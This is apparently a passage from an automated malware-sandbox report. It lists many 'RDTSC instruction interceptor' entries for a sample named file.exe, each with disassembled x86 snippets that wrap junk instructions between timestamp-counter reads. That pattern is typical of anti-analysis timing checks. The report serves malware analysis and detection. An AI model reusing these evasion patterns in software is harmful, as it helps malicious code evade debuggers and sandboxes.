Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59B55A second address: 59B5A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a or bh, FFFFFFE7h 0x0000000d push 00000000h 0x0000000f mov bx, 606Dh 0x00000013 mov dword ptr [ebp+122D1CE3h], ebx 0x00000019 push 00000000h 0x0000001b jmp 00007F40B477E791h 0x00000020 xchg eax, esi 0x00000021 pushad 0x00000022 pushad 0x00000023 jmp 00007F40B477E797h 0x00000028 push edx 0x00000029 pop edx 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e pop eax 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59B5A7 second address: 59B5CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F40B515FBFCh 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59D670 second address: 59D676 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59F62C second address: 59F6A4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F40B515FBF8h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push edi 0x00000028 call 00007F40B515FBF8h 0x0000002d pop edi 0x0000002e mov dword ptr [esp+04h], edi 0x00000032 add dword ptr [esp+04h], 0000001Ch 0x0000003a inc edi 0x0000003b push edi 0x0000003c ret 0x0000003d pop edi 0x0000003e ret 0x0000003f push edi 0x00000040 add ebx, 23DBC9B8h 0x00000046 pop ebx 0x00000047 push 00000000h 0x00000049 add dword ptr [ebp+122D1D79h], edi 0x0000004f jng 00007F40B515FBFCh 0x00000055 xchg eax, esi 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 jo 00007F40B515FBF6h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59F6A4 second address: 59F6A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59E794 second address: 59E7AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A0733 second address: 5A073E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F40B477E786h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A184A second address: 5A1850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A1850 second address: 5A18B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E78Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov ebx, dword ptr [ebp+124828B6h] 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 jmp 00007F40B477E792h 0x0000001a pop edi 0x0000001b push 00000000h 0x0000001d jmp 00007F40B477E78Ch 0x00000022 xchg eax, esi 0x00000023 push ebx 0x00000024 jo 00007F40B477E798h 0x0000002a jmp 00007F40B477E792h 0x0000002f pop ebx 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F40B477E78Ch 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A2C08 second address: 5A2C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F40B515FBF6h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A75B0 second address: 5A75B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ABF65 second address: 5ABF6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F40B515FBF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B2011 second address: 5B2032 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E794h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B2032 second address: 5B2057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F40B515FC06h 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e jnl 00007F40B515FBF6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 550B55 second address: 550B6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B477E791h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B4177 second address: 5B417C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B8A49 second address: 5B8A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F40B477E786h 0x0000000a jne 00007F40B477E786h 0x00000010 popad 0x00000011 jnc 00007F40B477E78Eh 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 jns 00007F40B477E788h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B9295 second address: 5B929C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B9545 second address: 5B954F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F40B477E792h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B954F second address: 5B9575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F40B515FBF6h 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007F40B515FBFDh 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jc 00007F40B515FC14h 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B96FD second address: 5B9707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B9707 second address: 5B971D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jo 00007F40B515FBF8h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B99D5 second address: 5B99DF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B9B4C second address: 5B9B77 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F40B515FC07h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnc 00007F40B515FBF8h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B9B77 second address: 5B9B7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B9B7B second address: 5B9B7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B9B7F second address: 5B9B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F40B477E786h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007F40B477E78Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B9B97 second address: 5B9BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jng 00007F40B515FBF6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B9BA3 second address: 5B9BA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BDECA second address: 5BDED2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BDED2 second address: 5BDEE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F40B477E786h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F40B477E78Eh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BE068 second address: 5BE06E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BE06E second address: 5BE07A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F40B477E78Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BE07A second address: 5BE0B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F40B515FC01h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F40B515FBFBh 0x00000013 jbe 00007F40B515FBF6h 0x00000019 popad 0x0000001a jmp 00007F40B515FBFFh 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BE0B8 second address: 5BE0CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnp 00007F40B477E786h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BE0CA second address: 5BE0D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BE217 second address: 5BE223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F40B477E786h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BE987 second address: 5BE993 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F40B515FBF6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56E9B6 second address: 56E9BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56E9BB second address: 56E9CD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F40B515FBF8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56E9CD second address: 56E9D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56E9D3 second address: 56E9D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56E9D7 second address: 56E9E3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 js 00007F40B477E786h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BF418 second address: 5BF438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 jns 00007F40B515FBF6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 jmp 00007F40B515FBFCh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C3B7A second address: 5C3B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F40B477E795h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C3CBD second address: 5C3CC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C3DFC second address: 5C3E10 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F40B477E786h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C3E10 second address: 5C3E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C3E14 second address: 5C3E1E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C42EB second address: 5C42F7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C3865 second address: 5C3869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C3869 second address: 5C3875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C3875 second address: 5C387F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F40B477E786h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C387F second address: 5C3885 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C4AD4 second address: 5C4ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C4ADA second address: 5C4AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F40B515FC07h 0x0000000a jmp 00007F40B515FBFBh 0x0000000f jnl 00007F40B515FBF6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58FE23 second address: 58FE32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B477E78Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58FE32 second address: 56DF43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F40B515FBF8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 add dword ptr [ebp+124567D7h], ebx 0x0000002b lea eax, dword ptr [ebp+12484B49h] 0x00000031 mov dword ptr [ebp+122D3709h], ebx 0x00000037 nop 0x00000038 ja 00007F40B515FC10h 0x0000003e push eax 0x0000003f jns 00007F40B515FC04h 0x00000045 nop 0x00000046 mov dword ptr [ebp+1244F1DBh], edi 0x0000004c call dword ptr [ebp+122D1F3Ah] 0x00000052 push eax 0x00000053 push ebx 0x00000054 jne 00007F40B515FBF6h 0x0000005a pop ebx 0x0000005b push esi 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58FFD0 second address: 58FFD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5904EF second address: 5904F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5904F3 second address: 5904F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59064B second address: 590651 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 590651 second address: 590657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 590657 second address: 59065B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5907C3 second address: 5907C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 590A43 second address: 590A55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F40B515FBFCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 590A55 second address: 590A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 591282 second address: 5912A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5912A4 second address: 5912C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E798h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5912C0 second address: 56E9B6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F40B515FBF8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov cx, A2ACh 0x0000000f call dword ptr [ebp+122D1EF3h] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jnl 00007F40B515FBF6h 0x0000001e jmp 00007F40B515FC06h 0x00000023 jl 00007F40B515FBF6h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C9659 second address: 5C966B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F40B477E786h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C966B second address: 5C9680 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F40B515FBF6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d js 00007F40B515FBF6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C9680 second address: 5C9686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C990D second address: 5C9916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C9916 second address: 5C991C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C991C second address: 5C9920 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C9A7C second address: 5C9A8C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F40B477E786h 0x00000008 je 00007F40B477E786h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C9A8C second address: 5C9A92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D32EC second address: 5D330D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E799h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D330D second address: 5D3312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D3312 second address: 5D331E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 545126 second address: 545132 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F40B515FBFEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D2E19 second address: 5D2E3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E796h 0x00000007 push edx 0x00000008 jno 00007F40B477E786h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D2FC4 second address: 5D2FC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D2FC9 second address: 5D2FD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F40B477E786h 0x0000000a jns 00007F40B477E786h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D2FD9 second address: 5D2FF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC08h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D2FF5 second address: 5D3005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jnc 00007F40B477E786h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D5B59 second address: 5D5B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DC17E second address: 5DC192 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
